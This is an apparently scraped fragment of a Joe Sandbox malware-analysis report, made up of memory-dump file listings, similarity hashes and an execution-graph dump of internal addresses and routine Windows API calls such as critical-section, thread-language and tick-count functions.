            • Associated: 00000003.00000002.799141819.0000000006065000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799163616.0000000006069000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799181654.000000000606B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799199067.000000000606D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799219580.0000000006079000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799236013.000000000607B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799261906.000000000607D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799287767.0000000006083000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799311292.0000000006087000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799330344.0000000006089000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799370228.0000000006093000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799389742.0000000006095000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.799534762.00000000060C2000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800585452.0000000006191000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800602949.0000000006193000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800651803.00000000061A1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800668075.00000000061A5000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800693665.00000000061A7000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800719211.00000000061A9000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800734506.00000000061AB000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800760531.00000000061AD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800855699.00000000061BD000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800873052.00000000061BF000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.800898785.00000000061C1000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801021151.00000000061EC000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801141100.0000000006209000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801159221.000000000620B000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801188471.000000000620D000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801214324.000000000620F000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801257035.0000000006214000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000003.00000002.801284190.0000000006216000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_3_2_4780000_rundll32.jbxd
            Similarity
            • API ID: Thread$LanguagesPreferred$Language
            • String ID:
            • API String ID: 2255706666-0
            • Opcode ID: f33964d7b792fb003f5563daffcd9b43d1ae04cb3adf30bb2a91c226c8f8b47f
            • Instruction ID: e3726e91893c2aba8d51a2e55af7a9bb39f1c19b0efbd3df2011c9ea68da554b
            • Opcode Fuzzy Hash: f33964d7b792fb003f5563daffcd9b43d1ae04cb3adf30bb2a91c226c8f8b47f
            • Instruction Fuzzy Hash: 47314070E4421E9BDB60EFA8C884AAEBBB5FF48314F104169E515E7395DB74AE04CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:8%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:561
            Total number of Limit Nodes:8
            execution_graph 5685 478a08c 5686 478a0fe 5685->5686 5687 4789fec 5685->5687 5687->5686 5688 4787028 2 API calls 5687->5688 5689 478a086 5688->5689 5020 479010c 5022 4790114 5020->5022 5021 4790150 5022->5021 5024 478d478 5022->5024 5025 478d4a5 5024->5025 5026 478d486 5024->5026 5025->5021 5026->5025 5029 478d430 5026->5029 5030 478d45c 5029->5030 5031 478d440 5029->5031 5030->5021 5033 478e6a4 5031->5033 5034 478e6e5 5033->5034 5037 478e580 5034->5037 5036 478e71e 5036->5030 5039 478e5a1 5037->5039 5038 478e61c 5038->5036 5039->5038 5043 478dc6c RtlEnterCriticalSection 5039->5043 5041 478e638 5041->5038 5042 478dc6c 11 API calls 5041->5042 5042->5038 5044 478dcb8 RtlLeaveCriticalSection 5043->5044 5045 478dc98 5043->5045 5048 478dcc9 5044->5048 5046 478dca9 RtlLeaveCriticalSection 5045->5046 5047 478dd5a 5046->5047 5047->5041 5049 478dd27 RtlEnterCriticalSection 5048->5049 5053 478dcea 5048->5053 5054 478db50 GetThreadUILanguage 5048->5054 5050 478dd3f 5049->5050 5052 478dd50 RtlLeaveCriticalSection 5050->5052 5052->5047 5053->5049 5055 478db6c 5054->5055 5056 478dbc5 5054->5056 5067 478db0c GetThreadPreferredUILanguages 5055->5067 5058 478db0c 2 API calls 5056->5058 5063 478dbcd 5058->5063 5060 478dc14 SetThreadPreferredUILanguages 5062 478db0c 2 API calls 5060->5062 5064 478dc2a 5062->5064 5063->5060 5066 478dc55 5063->5066 5065 478dc45 SetThreadPreferredUILanguages 5064->5065 5064->5066 5065->5066 5066->5053 5068 478db46 SetThreadPreferredUILanguages 5067->5068 5069 478db2d 5067->5069 5068->5056 5070 478db36 GetThreadPreferredUILanguages 5069->5070 5070->5068 5071 4977df0 5076 4977cc4 5071->5076 5073 4977dff 5074 4977e0c 5073->5074 5082 4978a98 5073->5082 5078 4977cdd 5076->5078 5077 4977dbe 5077->5073 5078->5077 5096 4977b58 5078->5096 5080 4977d78 5080->5077 5081 4977dbc DispatchMessageW 5080->5081 5081->5077 5123 4978a0c 5082->5123 5085 4979140 21 API calls 5086 4978ae1 5085->5086 5127 4978cf4 5086->5127 5088 4978b03 5089 4978b49 5088->5089 5091 4978b51 5088->5091 5092 4978b53 5088->5092 5159 49789a8 5089->5159 5093 4978bd3 5091->5093 5132 4849070 5091->5132 5092->5091 5095 49789a8 20 API calls 5092->5095 5093->5074 5095->5091 5097 4977b83 5096->5097 5098 4977b6c 5096->5098 5097->5080 5098->5097 5100 4979140 5098->5100 5101 4979156 5100->5101 5105 4979166 5100->5105 5106 49790cc 5101->5106 5103 497915d 5110 4975a08 5103->5110 5105->5097 5107 49790da 5106->5107 5109 497910c 5106->5109 5107->5109 5114 4978ed8 5107->5114 5109->5103 5112 4975a14 5110->5112 5111 4975a7d 5111->5105 5112->5111 5118 4977df0 5112->5118 5115 4978ee8 5114->5115 5116 4978f14 5115->5116 5117 4979140 21 API calls 5115->5117 5116->5109 5117->5116 5119 4977cc4 21 API calls 5118->5119 5120 4977dff 5119->5120 5121 4977e0c 5120->5121 5122 4978a98 21 API calls 5120->5122 5121->5112 5122->5121 5124 4978a18 5123->5124 5163 48c2914 5124->5163 5129 4978d08 5127->5129 5128 4978d1e 5128->5088 5129->5128 5203 48ebaf4 5129->5203 5131 4978d3c 5131->5088 5133 4849084 5132->5133 5134 484908d 5132->5134 5133->5093 5270 484973c 5134->5270 5137 48490cb 5142 48490cf 5137->5142 5138 484973c 20 API calls 5139 48490a4 5138->5139 5281 47ac43c 5139->5281 5141 48490c6 5287 4789ee0 5141->5287 5293 47896f4 5142->5293 5145 48490f1 5297 478947c 5145->5297 5147 48490f9 5148 4849266 5147->5148 5149 4834cfc 20 API calls 5147->5149 5148->5093 5150 4849153 5149->5150 5306 4834b70 5150->5306 5152 4849160 5310 478965c 5152->5310 5154 484916a 5155 47896f4 2 API calls 5154->5155 5156 484921b 5155->5156 5157 478947c 5 API calls 5156->5157 5158 4849223 5157->5158 5158->5093 5160 49789b5 5159->5160 5161 4978a08 5160->5161 5376 497491c 5160->5376 5161->5091 5164 48c2928 5163->5164 5166 48c294e 5164->5166 5167 48ca3cc 5164->5167 5166->5085 5166->5086 5172 48ca3eb 5167->5172 5173 48ca44b 5167->5173 5168 48ca482 5168->5166 5170 4834cfc 20 API calls 5170->5172 5171 48ca3cc 20 API calls 5171->5172 5172->5170 5172->5171 5172->5173 5173->5168 5174 4834cfc 5173->5174 5175 4834d09 5174->5175 5176 4834d18 5174->5176 5178 4834c10 5175->5178 5176->5173 5183 479010c 5178->5183 5180 4834c4e 5187 47ac274 5180->5187 5182 4834c5d 5182->5182 5185 4790114 5183->5185 5184 4790150 5184->5180 5185->5184 5186 478d478 11 API calls 5185->5186 5186->5184 5188 47ac280 5187->5188 5191 47a7570 5188->5191 5190 47ac2ad 5190->5182 5194 47a7598 5191->5194 5197 47a75c8 5194->5197 5196 47a7590 5196->5190 5198 47a75d1 5197->5198 5199 47a7480 20 API calls 5198->5199 5201 47a7631 5198->5201 5199->5201 5200 47a7698 5200->5196 5201->5200 5202 47a7480 20 API calls 5201->5202 5202->5201 5204 48ebafa 5203->5204 5207 48b3ba4 5204->5207 5206 48ebb0f 5206->5131 5208 48b3baa 5207->5208 5211 48795f0 5208->5211 5210 48b3bbf 5210->5206 5212 48795f6 5211->5212 5215 484bdac 5212->5215 5214 487960b 5214->5210 5216 484bdb2 5215->5216 5219 484a388 5216->5219 5218 484bdc7 5218->5214 5220 484a38f 5219->5220 5221 484a3b4 5220->5221 5223 484a7ec 5220->5223 5221->5218 5224 484a80e 5223->5224 5225 484a842 5224->5225 5231 484a8a4 5224->5231 5235 484a6e8 5225->5235 5228 484a85a 5230 484a874 5228->5230 5241 484b8ac 5228->5241 5230->5221 5232 484a8b9 5231->5232 5246 484a72c 5232->5246 5234 484a8d6 5234->5225 5236 484a6f5 5235->5236 5257 47c33ec 5236->5257 5239 484a723 5239->5228 5244 484b8bc 5241->5244 5242 484b8f5 5242->5230 5244->5242 5245 484b8ac 20 API calls 5244->5245 5264 484b4ec 5244->5264 5245->5244 5247 484a746 5246->5247 5248 484a7a7 5246->5248 5249 47c1a9c 13 API calls 5247->5249 5248->5234 5250 484a753 5249->5250 5251 484a770 5250->5251 5252 484a75e 5250->5252 5254 47c2e54 13 API calls 5251->5254 5253 47c41d8 13 API calls 5252->5253 5255 484a76e 5253->5255 5254->5255 5255->5248 5256 47c2e54 13 API calls 5255->5256 5256->5248 5258 47c4680 9 API calls 5257->5258 5259 47c3403 5258->5259 5259->5239 5260 484b39c 5259->5260 5261 484b3b1 5260->5261 5262 47c47c4 20 API calls 5261->5262 5263 484b3c7 5262->5263 5263->5239 5265 484b4f8 5264->5265 5266 484b50a 5264->5266 5268 4834c10 20 API calls 5265->5268 5267 47c1a9c 13 API calls 5266->5267 5269 484b517 5267->5269 5268->5266 5269->5244 5314 4791318 5270->5314 5272 4849742 5273 4849796 5272->5273 5321 4847838 5272->5321 5274 4791318 2 API calls 5273->5274 5276 4849092 5274->5276 5276->5137 5276->5138 5279 4791318 2 API calls 5279->5273 5280 4849757 5325 485c184 5280->5325 5282 47ac44a 5281->5282 5283 479010c 11 API calls 5282->5283 5284 47ac474 5283->5284 5285 47a7570 20 API calls 5284->5285 5286 47ac482 5285->5286 5286->5141 5288 4789eee 5287->5288 5289 4789ee4 5287->5289 5292 4789f2c 5288->5292 5357 478701c 5288->5357 5354 478a710 5289->5354 5294 47896fc 5293->5294 5296 4789712 5294->5296 5366 4789320 5294->5366 5296->5145 5302 478948a 5297->5302 5298 47894b3 GetTickCount 5298->5302 5299 4789525 GetTickCount 5299->5302 5303 47894d8 5299->5303 5300 47894cb GetTickCount 5300->5302 5300->5303 5301 478955c GetTickCount 5304 478956c 5301->5304 5302->5298 5302->5299 5302->5300 5302->5301 5302->5303 5303->5147 5304->5301 5304->5303 5305 4789586 GetTickCount 5304->5305 5305->5304 5307 4834b7b 5306->5307 5308 4834c10 20 API calls 5307->5308 5309 4834b8f 5307->5309 5308->5309 5309->5152 5311 4789664 5310->5311 5312 47896f4 2 API calls 5311->5312 5313 478966b 5312->5313 5313->5154 5315 479134d TlsGetValue 5314->5315 5316 4791327 5314->5316 5317 4791332 5315->5317 5318 4791357 5315->5318 5316->5272 5319 4791337 TlsGetValue 5317->5319 5318->5272 5320 4791346 5319->5320 5320->5272 5322 484783e 5321->5322 5339 48493a4 5322->5339 5324 484785d 5324->5280 5345 485c2d0 5325->5345 5327 485c1ab 5328 485c1e8 5327->5328 5333 485c1fe 5327->5333 5329 47c33ec 9 API calls 5328->5329 5330 485c1fc 5329->5330 5351 485c374 5330->5351 5333->5330 5334 479010c 11 API calls 5333->5334 5335 485c22e 5334->5335 5336 47ac274 20 API calls 5335->5336 5337 485c23d 5336->5337 5338 4789ee0 2 API calls 5337->5338 5338->5330 5340 48493b6 5339->5340 5341 4849452 5340->5341 5342 47ac43c 20 API calls 5340->5342 5341->5324 5343 484944d 5342->5343 5344 4789ee0 2 API calls 5343->5344 5344->5341 5346 485c2df 5345->5346 5347 47896f4 2 API calls 5346->5347 5348 485c2e7 5347->5348 5349 478947c 5 API calls 5348->5349 5350 485c2ef 5349->5350 5350->5327 5352 478965c 2 API calls 5351->5352 5353 4849791 5352->5353 5353->5279 5360 478a704 5354->5360 5358 4791318 2 API calls 5357->5358 5359 4787021 5358->5359 5359->5292 5363 478a5d4 5360->5363 5365 478a5f0 5363->5365 5364 4786fe8 TlsGetValue TlsGetValue 5364->5365 5365->5364 5367 4789329 5366->5367 5369 478932e 5366->5369 5370 47891f4 5367->5370 5369->5296 5371 478920e 5370->5371 5372 478921c GetLogicalProcessorInformation 5371->5372 5375 4789264 5371->5375 5373 478922b 5372->5373 5372->5375 5374 478923d GetLogicalProcessorInformation 5373->5374 5373->5375 5374->5375 5375->5369 5377 4834cfc 20 API calls 5376->5377 5378 497492c 5377->5378 5378->5160 5517 4849283 5518 478965c 2 API calls 5517->5518 5519 484929a 5518->5519 5680 47b7fac 5681 479010c 11 API calls 5680->5681 5682 47b7fcc 5681->5682 5683 4789ee0 2 API calls 5682->5683 5684 47b7fe0 5683->5684 5642 478a0d2 5643 478a0fe 5642->5643 5644 4789fec 5642->5644 5644->5643 5647 4787028 5644->5647 5648 478a704 2 API calls 5647->5648 5649 4787033 5648->5649 5379 4b7238c 5380 4b723a4 5379->5380 5385 4b65ff4 5380->5385 5382 4b72402 5412 4978064 5382->5412 5384 4b7240e 5386 4b66071 5385->5386 5387 4b65ff8 5385->5387 5386->5382 5423 4b65f50 5387->5423 5389 4b66002 5390 4b65f50 20 API calls 5389->5390 5391 4b6600c 5390->5391 5392 4b65f50 20 API calls 5391->5392 5393 4b66016 5392->5393 5394 4b65f50 20 API calls 5393->5394 5395 4b66020 5394->5395 5396 4b65f50 20 API calls 5395->5396 5397 4b6602a 5396->5397 5398 4b65f50 20 API calls 5397->5398 5399 4b66034 5398->5399 5400 4b65f50 20 API calls 5399->5400 5401 4b6603e 5400->5401 5402 4b65f50 20 API calls 5401->5402 5403 4b66048 5402->5403 5404 4b65f50 20 API calls 5403->5404 5405 4b66052 5404->5405 5406 4b65f50 20 API calls 5405->5406 5407 4b6605c 5406->5407 5408 4b65f50 20 API calls 5407->5408 5409 4b66066 5408->5409 5410 4b65f50 20 API calls 5409->5410 5411 4b66070 5410->5411 5411->5382 5413 4978090 5412->5413 5414 497815d 5413->5414 5415 4978113 5413->5415 5417 49780f4 5413->5417 5418 4978115 5413->5418 5414->5384 5415->5414 5416 4977df0 21 API calls 5415->5416 5416->5415 5441 4977454 5417->5441 5450 496dbe8 5418->5450 5421 49780fc 5421->5415 5447 4972f1c 5421->5447 5426 4b6d674 5423->5426 5425 4b65f74 5425->5389 5427 4b6d67c 5426->5427 5428 4b6d6ad 5427->5428 5432 47a5c38 5427->5432 5428->5425 5430 47a5c38 20 API calls 5431 4b6d70c 5430->5431 5431->5428 5431->5430 5433 47a5c48 5432->5433 5434 47a5c69 5433->5434 5436 47a47e8 5433->5436 5434->5431 5437 47ac43c 20 API calls 5436->5437 5438 47a4801 5437->5438 5439 4789ee0 2 API calls 5438->5439 5440 47a4806 5439->5440 5440->5434 5442 4977463 5441->5442 5446 4977494 5442->5446 5454 49766b8 5442->5454 5444 4977472 5457 4976914 5444->5457 5446->5421 5448 496dbe8 20 API calls 5447->5448 5449 4972f28 5448->5449 5449->5415 5451 496dc0e 5450->5451 5453 496dbf8 5450->5453 5451->5453 5468 496f758 5451->5468 5453->5415 5464 49765b8 5454->5464 5458 4976930 5457->5458 5461 49769ce 5457->5461 5459 4976938 5458->5459 5460 49769d9 5458->5460 5459->5461 5463 4834cfc 20 API calls 5459->5463 5460->5461 5462 4834cfc 20 API calls 5460->5462 5461->5446 5462->5460 5463->5459 5465 4976654 5464->5465 5466 49765cd 5464->5466 5465->5444 5466->5465 5467 4834cfc 20 API calls 5466->5467 5467->5466 5469 496f770 5468->5469 5470 496fafa 5468->5470 5469->5470 5471 496f79e 5469->5471 5472 496f789 5469->5472 5470->5453 5474 496f7ca 5471->5474 5475 496f7b5 5471->5475 5482 496ef4c 5472->5482 5476 496f796 5474->5476 5494 4975ce4 5474->5494 5477 496ef4c 20 API calls 5475->5477 5479 496ef4c 20 API calls 5476->5479 5477->5476 5481 496f7e5 5479->5481 5480 49748d4 20 API calls 5480->5481 5481->5470 5481->5480 5483 496ef5d 5482->5483 5484 496ef9e 5483->5484 5487 496ef8a 5483->5487 5501 49748d4 5483->5501 5504 4975c74 5484->5504 5488 49748d4 20 API calls 5487->5488 5489 496ef96 5488->5489 5489->5476 5490 49748d4 20 API calls 5491 496efa8 5490->5491 5491->5489 5491->5490 5492 496efcd 5491->5492 5493 49748d4 20 API calls 5492->5493 5493->5489 5511 4975c94 5494->5511 5497 4975d04 5497->5476 5498 4975c74 20 API calls 5499 4975cfe 5498->5499 5500 4975c94 20 API calls 5499->5500 5500->5497 5502 4834cfc 20 API calls 5501->5502 5503 49748e4 5502->5503 5503->5483 5507 4975c3c 5504->5507 5506 4975c79 5506->5491 5508 4975c4c 5507->5508 5510 4975c62 5507->5510 5509 4834cfc 20 API calls 5508->5509 5508->5510 5509->5508 5510->5506 5512 4975ca7 5511->5512 5513 49748d4 20 API calls 5512->5513 5514 4975cc7 5512->5514 5516 4975cd4 5512->5516 5513->5512 5515 49748d4 20 API calls 5514->5515 5515->5516 5516->5497 5516->5498 5669 478f833 5670 478f839 5669->5670 5671 478f850 5669->5671 5673 478f1b4 5670->5673 5676 478f058 5673->5676 5675 478f1e3 5675->5671 5677 478f06c 5676->5677 5678 478f061 5676->5678 5677->5675 5679 478947c 5 API calls 5678->5679 5679->5677 5690 478f784 5693 478f0c4 5690->5693 5692 478f79b 5694 478f058 5 API calls 5693->5694 5695 478f0f4 5694->5695 5696 478f16b 5695->5696 5697 478f151 5695->5697 5700 478f125 5695->5700 5699 478cf1c 9 API calls 5696->5699 5698 478cf1c 9 API calls 5697->5698 5701 478f166 5698->5701 5699->5701 5700->5692 5701->5692 5520 4976808 5522 497681f 5520->5522 5521 49768dc 5522->5521 5524 478cf1c 5522->5524 5527 478cc74 5524->5527 5526 478cf26 5526->5521 5528 478cc97 5527->5528 5529 478ccb2 5527->5529 5528->5526 5530 478cd20 5529->5530 5532 478cded 5529->5532 5537 478cd87 5530->5537 5538 478cc30 5530->5538 5532->5537 5555 478c450 5532->5555 5533 478cc74 9 API calls 5533->5537 5535 478cd38 5535->5537 5548 478c328 5535->5548 5537->5528 5537->5533 5539 4791318 2 API calls 5538->5539 5540 478cc39 5539->5540 5541 478cc4f 5540->5541 5542 478cc41 5540->5542 5545 4791318 2 API calls 5541->5545 5543 4791318 2 API calls 5542->5543 5544 478cc46 5543->5544 5544->5535 5546 478cc5d 5545->5546 5547 4791318 2 API calls 5546->5547 5547->5544 5549 478c344 5548->5549 5550 478c388 5548->5550 5549->5550 5551 478c3f1 5549->5551 5552 478c3c2 5549->5552 5550->5537 5551->5550 5559 478c04c 5551->5559 5552->5550 5553 478c328 9 API calls 5552->5553 5553->5552 5556 478c459 5555->5556 5557 478c461 5555->5557 5629 478c210 5556->5629 5557->5537 5560 478c1eb 5559->5560 5564 478c06f 5559->5564 5560->5551 5561 478c328 9 API calls 5561->5564 5562 478c04c 9 API calls 5562->5564 5564->5560 5564->5561 5564->5562 5566 478fb24 5564->5566 5572 478faf8 5564->5572 5567 478fb36 5566->5567 5568 478faf8 5 API calls 5567->5568 5569 478fb4b 5568->5569 5576 478fa8c 5569->5576 5571 478fb62 5571->5564 5573 478fb1d 5572->5573 5574 478fb03 5572->5574 5573->5564 5621 478fac4 5574->5621 5577 478fabf 5576->5577 5578 478fa97 5576->5578 5577->5571 5580 478f6cc 5578->5580 5581 478f6e8 5580->5581 5582 478f6f0 5580->5582 5590 478f568 5581->5590 5599 478f40c 5582->5599 5585 478f75b 5585->5577 5586 478f718 5586->5585 5603 478f4d4 5586->5603 5591 478f61d 5590->5591 5592 478f581 5590->5592 5591->5582 5593 478f592 5592->5593 5595 4789320 2 API calls 5592->5595 5594 478947c 5 API calls 5593->5594 5598 478f5c1 5594->5598 5595->5593 5596 478f5f0 5596->5582 5598->5596 5614 478f3f8 5598->5614 5600 478f41f 5599->5600 5601 478f415 5599->5601 5600->5586 5602 478947c 5 API calls 5601->5602 5602->5600 5604 478f4dc 5603->5604 5605 478f4e5 5604->5605 5617 478efa4 5604->5617 5607 478f288 5605->5607 5608 478f2a2 5607->5608 5609 478f2ab 5608->5609 5611 478f2c5 5608->5611 5610 478cf1c 9 API calls 5609->5610 5613 478f2c0 5610->5613 5612 478cf1c 9 API calls 5611->5612 5611->5613 5612->5613 5613->5585 5615 4789320 2 API calls 5614->5615 5616 478f400 5615->5616 5616->5598 5618 478efaf 5617->5618 5619 4789320 2 API calls 5618->5619 5620 478efb6 5619->5620 5620->5605 5622 478fac8 5621->5622 5623 478fad5 5621->5623 5625 478f7a4 5622->5625 5623->5573 5626 478f7ec 5625->5626 5627 478f7c4 5625->5627 5626->5623 5628 478f40c 5 API calls 5627->5628 5628->5626 5630 478c225 5629->5630 5633 478c242 5629->5633 5631 478c239 5630->5631 5632 478c2b5 5630->5632 5630->5633 5631->5633 5636 478bea4 5631->5636 5632->5633 5634 478c210 9 API calls 5632->5634 5633->5557 5634->5632 5637 478c033 5636->5637 5639 478bec9 5636->5639 5637->5631 5638 478fb24 9 API calls 5638->5639 5639->5637 5639->5638 5640 478c210 9 API calls 5639->5640 5641 478bea4 9 API calls 5639->5641 5640->5639 5641->5639 5650 484922b 5651 4849234 5650->5651 5653 4849149 5650->5653 5665 4789760 5651->5665 5654 4849266 5653->5654 5655 4834cfc 20 API calls 5653->5655 5656 4849153 5655->5656 5657 4834b70 20 API calls 5656->5657 5658 4849160 5657->5658 5659 478965c 2 API calls 5658->5659 5660 484916a 5659->5660 5661 47896f4 2 API calls 5660->5661 5662 484921b 5661->5662 5663 478947c 5 API calls 5662->5663 5664 4849223 5663->5664 5666 4789768 5665->5666 5667 47896f4 2 API calls 5666->5667 5668 478976f 5667->5668 5668->5653
            APIs
            • RtlEnterCriticalSection.NTDLL(04B9CC14), ref: 0478DC8A
            • RtlLeaveCriticalSection.NTDLL(04B9CC14), ref: 0478DCAE
            • RtlLeaveCriticalSection.NTDLL(04B9CC14), ref: 0478DCBD
            • RtlEnterCriticalSection.NTDLL(04B9CC14), ref: 0478DD2C
            • RtlLeaveCriticalSection.NTDLL(04B9CC14), ref: 0478DD55
            Strings
            Memory Dump Source
            • Source File: 00000005.00000002.775146289.0000000004781000.00000020.00000001.01000000.00000003.sdmp, Offset: 04780000, based on PE: true
            • Associated: 00000005.00000002.775106553.0000000004780000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.775372064.000000000479C000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781155918.0000000004B82000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781521684.0000000004B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781572861.0000000004BA6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781591935.0000000004BA7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.781621934.0000000004BAA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782290558.0000000004C23000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782446228.0000000004C35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782512497.0000000004C54000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782536414.0000000004C56000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782640433.0000000004C60000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782822091.0000000004C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782863913.0000000004C92000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782914526.0000000004C9B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782957756.0000000004CA3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.782991496.0000000004CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783075043.0000000004CB1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783585312.0000000004D0B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783657864.0000000004D10000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783738802.0000000004D19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783800617.0000000004D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783846142.0000000004D38000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783885377.0000000004D3A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.783931040.0000000004D45000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784094597.0000000004D70000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784146835.0000000004D76000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784207759.0000000004D7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784311179.0000000004D87000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784385939.0000000004D8D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784451239.0000000004D95000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784500109.0000000004D97000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784561796.0000000004D9F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784583567.0000000004DA1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784936951.0000000004DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.784997996.0000000004DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785037845.0000000004DFD000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785086270.0000000004E19000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785124129.0000000004E26000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785206285.0000000004E34000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785255997.0000000004E41000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785304408.0000000004E51000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785366505.0000000004E58000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785404846.0000000004E62000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785471248.0000000004E6C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785526298.0000000004E72000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785564052.0000000004E7E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785603676.0000000004E80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.785631889.0000000004E89000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786320089.0000000004FB8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786357751.0000000004FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786406425.0000000004FC5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786437882.0000000004FDF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786645614.0000000005029000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786678570.0000000005032000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786693967.0000000005038000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000005.00000002.786718406.0000000005041000.00000002.00000001.01000000.00000003.sdmpDownload File
